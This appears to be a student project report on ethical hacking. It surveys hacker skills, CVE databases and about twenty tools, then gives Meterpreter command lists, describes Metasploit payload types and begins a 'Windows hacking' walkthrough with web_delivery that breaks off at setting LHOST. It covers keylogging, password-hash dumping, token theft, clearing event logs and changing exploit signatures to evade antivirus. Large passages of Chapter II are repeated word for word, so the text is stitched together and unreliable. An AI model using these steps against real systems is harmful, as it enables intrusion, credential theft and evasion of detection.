1Chapter-I

INTRODUCTION
1.1 OBJECTIVE:

Ethical hacking offers an objective analysis of an organization’s information security posture for
organizations of any level of security expertise. Ethical hacking can be very useful to many
organizations as it can provide clear idea about hacking tools. Security professionals and normal users
have to be trained well in order to use hacking tools. Management of an organization can be
benefited largely through implementing hacking tools. Hacking tools implementation process can be
understood with the help of this research . Network security or data security engineers in
organization will come to know about new ethical hacking methods and techniques that are available
in the present market by concentrating on this Ethical Hacking. The concepts in this study provide
knowledge related to security improvements. Business users can hack the data in order to use it for
the purpose of evaluating a correct process. Many organizations are encouraging ethical hacking
professionals in order to control their business operations effectively. Email systems, data bases and
communication applications can avoid or identify attacks by adopting the hacking tools. Malicious
attacks on the information or software can be prevented by implementing this research while using
ethical hacking tools.

1.2 PROBLEM STATEMENT:

With more and more companies entering the e-commerce ecosystem and adopting new technologies
like cloud computing, the threat from imminent security breaches is clearly demanding the need for
efficient information security systems. The rising threat from cyber-attacks has exposed the severe
shortage of talent in this sector.

1.3 WHAT IS CYBER-SECURITY ?

Cyber security has never been simple. And because attacks evolve every day as attackers become
more inventive, it is critical to properly define cyber security and identify what constitutes good cyber
security.

Why is this so important? Because year over year, the worldwide spend for cyber security continues
to grow: 71.1 billion in 2014 (7.9% over 2013), and 75 billion in 2015 (4.7% from 2014) and expected
to reach 101 billion by 2018. Organizations are starting to understand that malware is a publicly
Page 1 of 38
 available commodity that makes it easy for anyone to become a cyber attacker, and even more
companies offer security solutions that do little to defend against attacks. Cyber security demands
focus and dedication.

Cyber security protects the data and integrity of computing assets belonging to or connecting to an
organization’s network. Its purpose is to defend those assets against all threat actors throughout the
entire life cycle of a cyber attack.

Kill chains, zero-day attacks, ransomware, alert fatigue and budgetary constraints are just a few of
the challenges that cyber security professionals face. Cyber security experts need a stronger
understanding of these topics and many others, to be able to confront those challenges more
effectively.

1.4 APPLICATIONS OF ETHICAL HACKING

 To build a computer system that prevents hackers’ access and safeguard system and
information from malicious attack.
 To manage adequate preventive measures in order to avoid security breaches.
 To safeguard user or customer information available in business transactions and visits.
 To test networks at regular intervals.
 To create security awareness at all levels in a business.

Page 2 of 38
 Chapter-ll

SYSTEM ANALYSIS

2.1 LITERATURE SURVEY:

Ethical hacking is a way of objectively analysing an organisation's data security structure. A new
league of IT professionals called white hat hackers or ethical hackers are emerging and gaining
prominence. The job of an ethical hacker is to purposefully penetrate security systems to fix these
weak points.
These professionals employ methods similar to that used by malicious hackers, but they are required
to be a step or two ahead of their vicious counterparts. Ethical or white hat hackers may be employed
by the government, banks, or private firms to prevent cyber crime. They hack the system with the
permission from the client and present a maturity scorecard for the network that highlights their
overall risk.
Penetration testing or pen testing is a way of evaluating Internet applications, networks and
computer systems for the level of vulnerability. This test helps in gauging the network and giving it a
real-world assessment.

2.2 Ethical hacking includes services like the following:

 Application Testing: Done to uncover flaws in the system at the very core or logical level
 Remote or war dialing: Used to test open-ended modem connections that remotely connect to a
network
 Local network testing: Deals with testing of services, protocols, system devices and virtual private
networks
 Wireless security: A method of measuring the level of security available in the framework as a whole
 System hardening: Done to strengthen the host and mend weaknesses
 Stolen laptop: Done using the PC of an important employee, this test examines for passwords and
personal information stored in a dial-up software
 Social engineering: This type of hacking is very difficult to carry out as it involves people, personalities
and employees.

Page 3 of 38
2.3 THE NEED FOR ETHICAL HACKERS:

Cyber Crimes are becoming more common and attackers more sophisticated with rouge nation-states
and terrorist organisations funding criminals to breech security networks either to extort hefty
ransoms or compromise national security features.
Businesses are faced with the challenge of dealing with complex security requirements that need to
be updated as per changing hacking tactics, handling hidden vulnerabilities and evolving
technologies. Ethical hacking firms with specially trained professionals come to the rescue of
businesses while ensuring effectiveness of service and confidentiality.
While many new businesses are better prepared in case of Cyber Attacks, traditional businesses still
lack the proactive understanding of the need for ethical hacking. For example, in India, banks having
faced the brunt many-a-times are hiring professional help to secure their networks. Still the
investment infrastructure for banks against cybercrime is quite miniscule compared to that of banks
in the US.
Hotels and other service wings of the industry seem to be lagging behind. Recently, many hotels in
the country were being attacked by a malware called 'dark hotel' in an attempt to spy on or stalk
corporate travellers and gain access through the hotel's WIFI services.
With new worms, malware, ransomwares and viruses springing up every day, there is a need to create
more awareness among businesses and how ethical hacking can help them to safeguard their
networks.
Ethical hacking as a career offers immense opportunities. A fresh certified ethical hacker could attract
a salary anywhere between INR 3.5 and 4 lakh per year. Experienced professionals in this field such
as security consultants, information security analysts, and ethical hacking experts can command
salaries in the range of INR 9 to INR 20 lakh.

2.3 The Essential Skills for Hacker:

As the hacker is among the most skilled information technology disciplines, it requires a wide
knowledge of IT technologies and techniques.

2.3.1 The Fundamental Skills:

These are the basics that every hacker should know before even trying to hack. Once you have a good grasp
on everything in this section, you can move into the intermediary level.
Page 4 of 38
1.Basic Computer Skills:

It probably goes without saying that to become a hacker you need some basic computer skills. These skills go
beyond the ability to create a Word document or cruise the Internet. You need to be able to use the
command line in Windows, edit the registry, and set up your networking parameters.

Many of these basic skills can be acquired in a basic computer skills course like A+.

2.Networking Skills:

DHCP

NAT

Subnetting

IPv4

IPv6

Public v Private IP

DNS

Routers and switches

VLANs

OSI model

MAC addressing

ARP

As we are often exploiting these technologies, the better you understand how they work, the more
successful you will be. Note that I did not write the two guides below, but they are very informative and
cover some of the networking basics mentioned above.

Page 5 of 38
3.Virtualization:

You need to become proficient in using one of the virtualization software packages such as VirtualBox or
VMWare Workstation. Ideally, you need a safe environment to practice your hacks before you take them out
in real world. A virtual environment provides you a safe environment to test and refine your hacks before
going live with them.

4.Security Concepts & Technologies:

A good hacker understands security concepts and technologies. The only way to overcome the roadblocks
established by the security admins is to be familiar with them. The hacker must understand such things as
PKI (public key infrastructure), SSL (secure sockets layer), IDS (intrusion detection system), firewalls, etc.

The beginner hacker can acquire many of these skills in a basic security course such as Security+.

5.Wireless Technologies:

In order to be able to hack wireless, you must first understand how it works. Things like the encryption
algorithms (WEP, WPA, WPA2), the four-way handshake, and WPS. In addition, understanding such as things
as the protocol for connection and authentication and the legal constraints on wireless technologies.

To get started, check out my guide below on getting started with wireless terms and technologies, then read
our collection of Wi-Fi hacking guides for further information on each kind of encryption algorithms and for
examples of how each hack works.

2.3.2The Intermediate Skills:

This is where things get interesting, and where you really start to get a feel for your capabilities as a hacker.
Knowing all of these will allow you to advance to more intuitive hacks where you are calling all the shots—
not some other hacker.

1.Scripting

Without scripting skills, the hacker will be relegated to using other hackers' tools. This limits your

effectiveness. Every day a new tool is in existence loses effectiveness as security admins come up with

defenses.

Page 6 of 38
 To develop your own unique tools, you will need to become proficient at least in one of the scripting

languages including the BASH shell. These should include one of Perl, Python, or Ruby.

2.Advanced TCP/IP

The beginner hacker must understand TCP/IP basics, but to rise to the intermediate level, you must
understand in intimate details the TCP/IP protocol stack and fields. These include how each of the fields
(flags, window, df, tos, seq, ack, etc.) in both the TCP and IP packet can be manipulated and used against the
victim system to enable MitM attacks, among other things.

3.Cryptography

Although one doesn't need to be a cryptographer to be a good hacker, the more you understand the
strengths and weaknesses of each cryptographic algorithm, the better the chances of defeating it. In
addition, cryptography can used by the hacker to hide their activities and evade detection.

4.Reverse Engineering

Reverse engineering enables you to open a piece of malware and re-build it with additional features and
capabilities. Just like in software engineering, no one builds a new application from scratch. Nearly every new
exploit or malware uses components from other existing malware.

In addition, reverse engineering enables the hacker to take an existing exploit and change its signature so
that it can fly past IDS and AV detection.

Intangible Skills:

Along with all these computer skills, the successful hacker must have some intangible skills. These include
the following.

1.Think Creatively

There is ALWAYS a way to hack a system and many ways to accomplish it. A good hacker can think creatively
of multiple approaches to the same hack.

These are the basics that every hacker should know before even trying to hack. Once you have a good grasp
on everything in this section, you can move into the intermediary level.

It probably goes without saying that to become a hacker you need some basic computer skills. These skills go
beyond the ability to create a Word document or cruise the Internet. You need to be able to use the
command line in Windows, edit the registry, and set up your networking parameters.
Page 7 of 38
 Many of these basic skills can be acquired in a basic computer skills course like A+.

DHCP

NAT

Subnetting

IPv4

IPv6

Public v Private IP

DNS

Routers and switches

VLANs

OSI model

MAC addressing

ARP

As we are often exploiting these technologies, the better you understand how they work, the more
successful you will be. Note that I did not write the two guides below, but they are very informative and
cover some of the networking basics mentioned above.

In order to be able to hack wireless, you must first understand how it works. Things like the encryption
algorithms (WEP, WPA, WPA2), the four-way handshake, and WPS. In addition, understanding such as things
as the protocol for connection and authentication and the legal constraints on wireless technologies.

To get started, check out my guide below on getting started with wireless terms and technologies, then read
our collection of Wi-Fi hacking guides for further information on each kind of encryption algorithms and for
examples of how each hack works.

This is where things get interesting, and where you really start to get a feel for your capabilities as a hacker.
Knowing all of these will allow you to advance to more intuitive hacks where you are calling all the shots—
not some other hacker.

Without scripting skills, the hacker will be relegated to using other hackers' tools. This limits your effectiveness. Every
day a new tool is in existence loses effectiveness as security admins come up with defenses.

Page 8 of 38
 To develop your own unique tools, you will need to become proficient at least in one of the scripting

languages including the BASH shell. These should include one of Perl, Python, or Ruby.

Reverse engineering enables you to open a piece of malware and re-build it with additional features and
capabilities. Just like in software engineering, no one builds a new application from scratch. Nearly every new
exploit or malware uses components from other existing malware.

In addition, reverse engineering enables the hacker to take an existing exploit and change its signature so
that it can fly past IDS and AV detection.

Along with all these computer skills, the successful hacker must have some intangible skills. These include
the following.

There is ALWAYS a way to hack a system and many ways to accomplish it. A good hacker can think creatively
of multiple approaches to the same hack.

2.Problem-Solving Skills

A hacker is always coming up against seemingly unsolvable problems. This requires that the hacker be
accustomed to thinking analytically and solving problems. This often demands that the hacker diagnose
accurately what is wrong and then break the problem down into separate components. This is one of those
abilities that comes with many hours of practice.

3.Persistence

A hacker must be persistent. If you fail at first, try again. If that fails, come up with a new approach and try
again. It is only with a persistence that you will be able to hack the most secured systems.

2. CONCLUSION:

The security of an enterprise should be analysed for effectiveness from time to time. Since businesses
work in a structured yet complex environment comprising of security, policies and changing
technologies, involving complex interactions and interoperations, there is a need to assess the system
with a holistic approach. Ethical hacking solutions are possibly the best way of examining such
systems and fine-tuning any minor gaps that may lead to compromise of the entire organization.

Page 9 of 38
 Chapter-III

ANALYSIS

INTRODUCTION:

SOFTWARE REQUIREMENTS SPECIFICATIONS:

Operating System : Kali Linux , Parrot Security OS, BackBox , BlackArch

Linux, etc.
Programming Tool : FATRAT, Wifite, Air geddon etc.
Password Cracking tools : John The Ripper, Hash Cat etc.
Web Server : APACHE2.
Virtual Machines : Vmware workstation or Virtual Box.
Hacking tools :

SYSTEM REQUIREMENTS:

RAM : 8 GB or more

Kali Linux "Guest " Minimal Memory : 512 MB/1 GB or more

Metasploitable "Guest " Min Memory : 256 MB/512 MB or more

Windows "Guest " Minimal Memory : 512 MB or more

Processor : i5 or above with 2.20 GHz at least .

HDD : As Per the requirement.

Graphics Card : 4GB ( You will need a lot of GPU power when you

brute forcing for passwords).

Page 10 of 38
Exploit Databases for Finding Vulnerabilities:

Hundreds of Windows 10, macOS, and Linux vulnerabilities are disclosed every single week, many of which
elude mainstream attention. Most users aren't even aware that newly found exploits and vulnerabilities
exist, nor that CVEs can be located by anyone in just a few clicks from a selection of websites online.

What Is a CVE?

The numbered reference system used to catalog disclosed vulnerabilities and exploits is called the
Common Vulnerabilities and Exposures (CVE) system.

CVEs and exploits are highly sought after by black hats and security professionals alike. They can be used to
hack into outdated Windows versions, perform privilege escalation, and access routers without the target's
knowledge, among other things.

1.CIRCL:

The Computer Incident Response Center Luxembourg (CIRCL) is an information security

organization designed to handle cyber threat detections and incidents. Its website features security
research publications and a searchable CVE database.

2.VulDB:

For decades, the Vul DB specialists have coordinated with large and independent information
security communities to compile a searchable database of over 124,000 CVEs. Hundreds of new
entries are added on a daily basis and scored (e.g., low, medium, high) based on the severity of the
disclosed exploit.

3.SecurityFocus:

Security Focus has reported on cybersecurity incidents and published whitepapers in the past.
These days, it tracks software bug reports and has been compiling a searchable archive of CVEs
since 1999.

4.0day.today:

0day.today (accessible via tor onion service), is an exploit database that also sells private exploits
for as much as $5,000 USD. While there are several reports of scams occurring with private sales,
the searchable public database is quite legitimate.
Page 11 of 38
5.Rapid7:

Rapid7, creators of the Metasploit Framework, have a searchable CVE database on its website.
However, unlike other databases, Rapid7 very rarely features the actual exploit code. Instead, it
offers advisories containing helpful reference links to relevant documentation for remediation, as
well as links to msf console modules that automate the indexed exploit.

For example, since the public disclosure of CVE-2018-15473, the aforementioned SSH username
enumeration exploit, the hack can be found in msfconsole and executed with great ease.

6.NIST:

The National Institute of Standards and Technology (NIST) is one of the oldest physical science
laboratories in the United States. It's currently involved in a myriad of technologies and research
such as its national initiative for cybersecurity education, CVE archive, cutting-edge technology
news, and quantum information science program. Anyone can search its CVE database.

7.Packet Storm Security:

Packet Storm Security isn't exactly intended to be a searchable database of exploits. Rather, it's a
general resource of information pertaining to vulnerability advisories and remediations. The Packet
Storm website also features hacker news, research whitepapers, and a feed of recently disclosed
CVEs.

8.Exploit Database:

The Exploit Database is currently maintained by the Offensive Security organization which
specializes in advanced Windows exploitation, web application security, and various prominent
penetration tester certification training.

Its searchable database currently features a collection of over 40,000 remote, local, web
application, and denial-of-service exploits, as well as a Google hacking database, research
whitepapers, and a database search function.

Page 12 of 38
9.Vulners:

Vulners, founded by Kir Ermakov, is a CVE database currently containing over 176,500 indexed
exploits. Its website includes CVE statistics, a Linux vulnerability management auditor, and
searchable CVE database.

10.MITRE:

MITRE is a US government-sponsored organization that manages federally funded research and

development centers (FFRDC). Its website emphasizes commercial publications and information
related to their FFRDCs such as the National Cybersecurity program. It also maintains one of the
biggest and widely referenced CVE databases currently available, searchable by the public.

Operating System Advisory & CVE Databases (Bonus):

Some readers may be looking to explore recent OS-specific vulnerabilities — or simply trying to
remain aware to better protect themselves. Most operating system distributions offer an advisory
listing on their website. These are mostly application-specific vulnerabilities and bugs, but in many
cases, can be easily exploited by attackers.

Microsoft: Windows Security Update Guide

Android: Monthly Security Bulletin

Apple: Security Updates

Ubuntu: Security Notices, CVE Tracker, Mailing List

Debian: Recent Advisories, Mailing List

RedHat: CVE Database, Security Advisories

Arch Linux: Security Advisories

Page 13 of 38
What are Hacking Tools?

Hacking Tools are computer programs and scripts that help you find and exploit weaknesses in
computer systems, web applications, servers and networks. There is a variety of such tools available
on the market. Some of them are open source while others are commercial solution.

In this list we highlight the top 20 tools for Ethical Hacking of web applications, servers and
networks.

1) Netsparker:

Netsparker is an easy to use web application security scanner that can automatically find SQL
Injection, XSS and other vulnerabilities in your web applications and web services. It is available as
on-premises and SAAS solution.

Features:

 Dead accurate vulnerability detection with the unique Proof-Based Scanning Technology.
 Minimal configuration required. Scanner automatically detects URL rewrite rules, custom 404
error pages.
 REST API for seamless integration with the SDLC, bug tracking systems etc.
 Fully scalable solution. Scan 1,000 web applications in just 24 hours.

2) Acunetix:

Acunetix is a fully automated ethical hacking solution that mimics a hacker to keep one step ahead
of malicious intruders. The web application security scanner accurately scans HTML5, JavaScript and
Single-page applications. It can audit complex, authenticated web apps and issues compliance and
management reports on a wide range of web and network vulnerabilities.

Features:

 Scans for all variants of SQL Injection, XSS, and 4500+ additional vulnerabilities
 Detects over 1200 WordPress core, theme, and plugin vulnerabilities
 Fast & Scalable – crawls hundreds of thousands of pages without interruptions
 Integrates with popular WAFs and Issue Trackers to aid in the SDLC
 Available On Premises and as a Cloud solution.

Page 14 of 38
3) Probe.ly:

Probe.ly continuously scans for vulnerabilities in your Web Applications. It allows its customers to
manage the life cycle of vulnerabilities and provides them with some guidance on how to fix them.
Probe.ly is a security tool built having Developers in mind.

Features:

 Scans for SQL Injections, XSS, OWASP TOP10 and over 5000 vulnerabilities, including 1000
WordPress and Joomla vulnerabilities.
 Full API - All features of Probely are also available through an API.
 Integration with your CI tools, Slack and Jira.
 Unlimited team members.
 PDF Reports to showcase your security.
 Diverse scanning profiles (ranging from safe to aggressive scans).
 Multiple Environment Targets - Production (non-intrusive scans) and Testing (intrusive and
complete scans).

4) Burp Suite:

Burp Suite is a useful platform for performing Security Testing of web applications. Its various tools
work seamlessly together to support the entire pen testing process. It spans from initial mapping to
analysis of an application's attack surface.

Features:

 It can detect over 3000 web application vulnerabilities.

 Scan open-source software and custom-built applications
 An easy to use Login Sequence Recorder allows the automatic scanning
 Review vulnerability data with built-in vulnerability management.
 Easily provide wide variety of technical and compliance reports
 Detects Critical Vulnerabilities with 100% Accuracy
 Automated crawl and scan
 Advanced scanning feature for manual testers
 Cutting-edge scanning logic

Page 15 of 38
5) Ettercap:

Ettercap is an ethical hacking tool. It supports active and passive dissection includes features for network
and host analysis.

Features:

 It supports active and passive dissection of many protocols

 Feature of ARP poisoning to sniff on a switched LAN between two hosts
 Characters can be injected into a server or to a client while maintaining a live connection
 Ettercap is capable of sniffing an SSH connection in full duplex
 Allows sniffing of HTTP SSL secured data even when the connection is made using proxy
 Allows creation of custom plugins using Ettercap's API

6) Aircrack:

Aircrack is a trustable ethical hacking tool. It cracks vulnerable wireless connections. It is powered
by WEP WPA and WPA 2 encryption Keys.

Features:

 More cards/drivers supported

 Support all types of OS and platforms
 New WEP attack: PTW
 Support for WEP dictionary attack
 Support for Fragmentation attack
 Improved tracking speed

7) Angry IP Scanner:

Angry IP Scanner is open-source and cross-platform ethical hacking tool. It scans IP addresses and
ports.

Features:

 Scans local networks as well as the Internet

 Free and open-source tool
 Random or file in any format
 Exports results into many formats
 Extensible with many data fetchers
Page 16 of 38
  Provides command-line interface
 Works on Windows, Mac, and Linux
 No need for Installation

8) GFI LanGuard:

GFI LanGuard is an ethical tool that scan networks for vulnerabilities. It can acts as your 'virtual
security consultant' on demand. It allows creating an asset inventory of every device.

Features:

 It helps to maintain a secure network over time is to know which changes are affecting your
network and
 Patch management: Fix vulnerabilities before an attack
 Analyze network centrally
 Discover security threats early
 Reduce cost of ownership by centralizing vulnerability scanning
 Help to maintain a secure and compliant network

9) Savvius:

It is an ethical hacking tool. It performance issues and reduces security risk with the deep visibility
provided by Omnipeek. It can diagnose network issues faster and better with Savvius packet
intelligence.

Features:

 Powerful, easy-to-use network forensics software

 Savvius automates the capture of the network data required to quickly investigate security
alerts
 Software and integrated appliance solutions
 Packet intelligence combines deep analysis
 Rapid resolution of network and security issues
 Easy to use Intuitive workflow
 Expert and responsive technical support
 Onsite deployment for appliances
 Commitment to our customers and our products

Page 17 of 38
10) QualysGuard:

Qualys guard helps businesses streamline their security and compliance solutions. It also builds
security into their digital transformation initiatives. This tool can also check the performance
vulnerability of the online cloud systems.

Features:

 It is trusted globally
 No hardware to buy or manage
 It is a scalable, end-to-end solution for all aspects of IT security
 Vulnerability data securely stored and processed on an n-tiered architecture of load-balanced
servers
 It sensor provides continuous visibility
 Data analyzed in real time
 It can respond to threats in a real-time

11) Web Inspect:

Web Inspect is automated dynamic application security testing that allows performing ethical hacking
techniques. It provides comprehensive dynamic analysis of complex web applications and services.

Features:

 Allows to test dynamic behavior of running web applications to identify security vulnerabilities
 Keep in control of your scan by getting relevant information and statistics at a glance
 Centralized Program Management
 Advanced technologies, such as simultaneous crawl professional-level testing to novice security
testers
 Easily inform management on vulnerability trending, compliance management, and risk
oversight

12) Hashcat:

Hashcat is a robust password cracking ethical hacking tool. It can help users to recover lost
passwords, audit password security, or just find out what data is stored in a hash.

Features:
Page 18 of 38
  Open-Source platform
 Multi-Platform Support
 Allows utilizing multiple devices in the same system
 Utilizing mixed device types in the same system
 It supports distributed cracking networks
 Supports interactive pause/resume
 Supports sessions and restore
 Built-in benchmarking system
 Integrated thermal watchdog
 Supports automatic performance tuning

13) L0phtCrack:

L0phtCrack 6 is useful password audit and recovery tool. It identifies and assesses password
vulnerability over local machines and networks.

Features:

 Multicore & multi-GPU support helps to optimize hardware

 Easy to customize
 Simple Password Loading
 Schedule sophisticated tasks for automated enterprise-wide password
 Fix weak passwords issues by forcing password resets or locking accounts
 It allows multiple auditing OSes

14) Rainbow Crack:

Rainbow Crack is a password cracking tool widely used for ethical hacking. It cracks hashes with
rainbow tables. It uses time-memory tradeoff algorithm for this purpose.

Features:

 Full time-memory trade-off tool suites, including rainbow table generation

 It Support rainbow table of any hash algorithm
 Support rainbow table of any charset
 Support rainbow table in raw file format (.rt) and compact file format
 Computation on multi-core processor support
 GPU acceleration with multiple GPUs

Page 19 of 38
  Runs on Windows OS and Linux
 Unified rainbow table file format on every supported OS
 Command line user interface
 Graphics user interface

15) IKECrack:

IKECrack is an open source authentication crack tool. This ethical hacking tool is designed to brute-
force or dictionary attack. This tool also allows performing cryptography tasks.

Features:

 IKECrack is a tool that allows performing Cryptography tasks

 Initiating client sends encryption options proposal, DH public key, random number, and an ID in an
unencrypted packet to the gateway/responder.
 It is freely available for both personal and commercial use. Therefore, it is perfect choice for user
who wants an option for Cryptography programs

16) IronWASP:

IronWASP is an open source software for ethical hacking too. It is web application vulnerability
testing. It is designed to be customizable so that users can create their custom security scanners
using it.

Features:

 GUI based and very easy to use

 It has powerful and effective scanning engine
 Supports for recording Login sequence
 Reporting in both HTML and RTF formats
 Checks for over 25 types of web vulnerabilities
 False Positives and Negatives detection support
 It supports Python and Ruby
 Extensible using plug-ins or modules in Python, Ruby, C# or VB.NET.

17) Medusa:

Medusa is one of the best online brute-force, speedy, parallel password crackers ethical hacking
tool. This tool is also widely used for ethical hacking.

Page 20 of 38
 Features:

 It is designed in such a way that it is speedy, massively parallel, modular, login brute-forcer
 The main aim of this tool is to support as many services which allow remote authentication
 Allows to perform Thread-based parallel testing and Brute-force testing
 Flexible user input. It can be specified in a variety of ways
 All the service module exists as an independent .mod file.
 No modifications are needed to the core application to extend the supported list of services
for brute-forcing

18) NetStumbler:

NetStumbler is used to detect wireless networks on the Windows platform.

Features:

 Verifying network configurations

 Finding locations with poor coverage in a WLAN
 Detecting causes of wireless interference
 Detecting unauthorized ("rogue") access points
 Aiming directional antennas for long-haul WLAN links

19) SQLMap:

SQLMap automates the process of detecting and exploiting SQL Injection weaknesses. It is open
source and cross platform.

It supports the following database engines.

I. MySQL
II. Oracle
III. Postgre SQL
IV. MS SQL Server
V. MS Access
VI. IBM DB2
VII. SQLite
VIII. Firebird
IX. Sybase and SAP MaxDB

Page 21 of 38
It supports the following SQL Injection Techniques:

I. Boolean-based blind
II. Time-based blind
III. Error-based
IV. UNION query
V. Stacked queries and out-of-band.

20) Cain & Abel:

Cain & Abel is a Microsoft Operating System passwords recovery tool. It is used to Recover MS
Access passwords, Uncover password field Sniffing networks, Cracking encrypted passwords using
dictionary attacks, brute-force, and cryptanalysis attacks.

21) Nessus:

Nessus can be used to perform following actions such as :

 Remote vulnerability scanner

 Password dictionary attacks
 Denial of service attacks

It is closed source, cross platform and free for personal use.

Page 22 of 38
 Chapter-IV

IMPLEMENTATION

Commands for Metasploit's Meterpreter:

Core Commands:

At its most basic use, meterpreter is a Linux terminal on the victim's computer. As such, many of
our basic Linux commands can be used on the meterpreter even if it's on a Windows or other
operating system.

Here are some of the core commands we can use on the meterpreter

 ? - help menu
 background - moves the current session to the background
 bgkill - kills a background meterpreter script
 bglist - provides a list of all running background scripts
 bgrun - runs a script as a background thread
 channel - displays active channels
 close - closes a channel
 exit - terminates a meterpreter session
 help - help menu
 interact - interacts with a channel
 irb - go into Ruby scripting mode
 migrate - moves the active process to a designated PID
 quit - terminates the meterpreter session
 read - reads the data from a channel
 run - executes the meterpreter script designated after it
 use - loads a meterpreter extension
 write - writes data to a channel

Page 23 of 38
File System Commands:

 cat - read and output to stdout the contents of a file

 cd - change directory on the victim
 del - delete a file on the victim
 download - download a file from the victim system to the attacker system
 edit - edit a file with vim
 getlwd - print the local directory
 getwd - print working directory
 lcd - change local directory
 lpwd - print local directory
 ls - list files in current directory
 mkdir - make a directory on the victim system
 pwd - print working directory
 rm - delete a file
 rmdir - remove directory on the victim system
 upload - upload a file from the attacker system to the victim

Networking Commands:

 ipconfig - displays network interfaces with key information including IP address, etc.
 portfwd - forwards a port on the victim system to a remote service
 route - view or modify the victim routing table
 Step 4
 System Commands
 clearav - clears the event logs on the victim's computer
 drop_token - drops a stolen token
 execute - executes a command
 getpid - gets the current process ID (PID)
 getprivs - gets as many privileges as possible
 getuid - get the user that the server is running as
 kill - terminate the process designated by the PID
 ps - list running processes
 reboot - reboots the victim computer
 reg - interact with the victim's registry
Page 24 of 38
  rev2self - calls RevertToSelf() on the victim machine
 shell - opens a command shell on the victim machine
 shutdown - shuts down the victim's computer
 steal_token - attempts to steal the token of a specified (PID) process
 sysinfo - gets the details about the victim computer such as OS and name
 Step 5
 User Interface Commands
 enumdesktops - lists all accessible desktops
 getdesktop - get the current meterpreter desktop
 idletime - checks to see how long since the victim system has been idle
 keyscan_dump - dumps the contents of the software keylogger
 keyscan_start - starts the software keylogger when associated with a process such as Word
or browser
 keyscan_stop - stops the software keylogger
 screenshot - grabs a screenshot of the meterpreter desktop
 set_desktop - changes the meterpreter desktop
 uictl - enables control of some of the user interface components

Password Dump Commands

 hashdump - grabs the hashes in the password (SAM) file

Page 25 of 38
Metasploitable Framework:

Metasploit is an exploitation framework that every hacker should be knowledgeable of and skilled
at. It is one of my favorite hacking tools available.

Metasploit enables us to use pre-written exploits against known vulnerabilities in operating

systems, browsers and other applications and place a rootkit/listener/payload on the target system.
These payloads are what enable us to connect to the victim system and use it as our own after we
have exploited a vulnerability in its system. In this tutorial, we will look exclusively at the payloads
built into Metasploit.

Metasploit has many types of payloads we can leave on the target system. We are most familiar
with the generic/shell/reverse_tcp and the windows/meterpreter/reverse_tcp payloads, having
used those in multiple hacks already. In this guide, we will look at such things as how the payloads
work, how Metasploit categorizes the payloads, and what the types of payloads are. I hope this
understanding will help you to better choose the appropriate payload for your hack.

Steps to use Metasploitable Frame:

Step 1:

Fire Up Kali Linux & Open Metasploit

When we open the Metasploit console in Kali Linux, we immediately see that Metasploit lists the
number of exploits, auxiliary modules, post exploitation modules, payload modules, encoders, and
nops.

Page 26 of 38
 In the screenshot below, notice that there are 335 payloads in the current version of Metasploit
(yours may be slightly different based upon your version of Metasploit). This is a huge number of
payloads that can be used for multiple situations.

When we type:

msf > show payloads

Metasploit lists all 335 payloads as below.

Step 2:

Types of Payloads:

Among these 335 payloads in Metasploit, there are 8 types of payloads.

Page 27 of 38
Inline:

These payloads are a single package of exploit and payload. They are inherently more stable, but because
of their size, they can't always be used in small vulnerable memory areas.

Staged:

These payloads essentially are able to fit into very small spaces and create a foothold on the system and
then pull rest of the payload.

Meterpreter:

Is the all powerful payload that we most often want on a victim system. It works by .dll injection and
resides entirely in memory, leaving no trace of its existence on the hard drive or file system. It has a
number of specific commands and scripts developed for it, enabling us to largely work our will on the
victim system.

PassiveX:

This payload is for use when firewall rules restrict outbound traffic. In essence, it uses ActiveX through
Internet Explorer to hide its outbound traffic and evade the firewall by using HTTP requests and responds
just as any browser would.

NoNX:

In some CPUs, there is a built-in security feature called DEP (Data Execution Prevention). In Windows, it is
referred to as No eXecute, or NX. The idea behind this security feature is to keep from data making its way
to the CPU and being executed. The NoNX payloads are designed to evade this safety feature of modern
CPU's.

Ordz:

These type of payloads work on nearly all Windows operating systems. These are extremely small, but
somewhat unstable. They are dependent upon loading a .dll (dynamic link library) into the exploited
process.

IPv6:

These payloads, as their implies, are designed to work on IPv6 networks.

Page 28 of 38
Reflective DLL Injection:

These payload modules are injected directly into the target process while it is running in memory, thereby
never writing anything to the hard drive and leaving little or no evidence behind.

Step 3:

Payload Modules:

If we look in the Metasploit directory the Linux terminal in Kali, we can see that Metasploit categorizes its
payloads into three different types. Obviously, the eight types above are consolidated into these three
directories in Metasploit.

kali > cd /usr/share/metasploit-framework/modules/payloads

kali > ls -l

Staged:

Staged payloads use tiny stagers (see below) to fit into small exploitation spaces. In other words, if the
victim's system exploitation buffer or other memory area is very small and only allows a small amount of
code to be executed, first a small stager is placed in the memory area. The stager then "pulls" the rest of
the payload after this foothold is made on the victim system.

These larger staged payloads include such complex payloads as the Meterpreter and VNC Injection, both of
which include large and complex code. Generally, a staged payload will split the name of the payload

Page 29 of 38
between a "/", such as in the payload windows/shell/tcp_bind. The "tcp_bind" is the stager (see below)
and "shell" is the staged.

Unfortunately, this convention is not used consistently in Metasploit, so one often has to go to the "info"
section of the payload or find the directory it is in to determine if it is a staged payload.

Stagers:

Stagers are the small payloads whose only job is to fit into small memory area and then "pull" the larger
staged payload along. They kind of "plant the flag" on the victim and then enable the larger payload to be
loaded.

Singles:

Often referred to as "inline payloads," singles are self-contained units that do not require a stager. They are
generally more stable and preferred, but many times the code is too large to for the vulnerable memory
area on the victim system.

Let's now take a look inside that singles directory.

kali > cd singles

kali > ls -l

As we can see, the singles are broken down by vulnerable platform. If we want to see the singles available
for the Windows platform, we simply type:
Page 30 of 38
kali > cd windows

kali > ls -l

Inside this directory we can see all the singles payloads available for Windows. I have highlighted one of
these payloads, shell_reverse_tcp, that we have used in many of our hacks.

Payloads are key part of the Metasploit infrastructure and provide us with access once the exploit has been
completed. The better we understand them, the better we will be as a hackers.

 Social Engineering refers to psychological manipulation of people into performing actions or

divulging confidential information in order to gain access to system , network or physical location or
for financial gains

 Using vulnerabilities, in this method we use system vulnerabilities(weakness) to exploit the System
gain access.

Page 31 of 38
Basic Hacking Process:

 Information Gathering

 Scanning

 Gaining Access

 Maintaining Access

 Clearing tracks

Page 32 of 38
OS can be hacked hijacked by following 3 main steps:

 Information Gathering

 Setting the payload

 exploiting

STEPS FOR WINDOWS HACKING:

 Open kali linux

 Open terminal

 Type ifconfig in terminal to know our ip address

Page 33 of 38
 Now type netdiscover in terminal to make sure that victim is alive.

 Above figure shows no of devices are present in the network

 Now type msfconsole in terminal to open Metasploit framework

 Now type web_delivery in msfconsole to get exploit path

Page 34 of 38
 copy the resulted url or path i.e., (exploit/multi/script/web_delivery)

 Now type “ use exploit/multi/script/web_delivery” to use that path

 Now set SRVHOST ,LHOST and URI PATH as shown in below fig

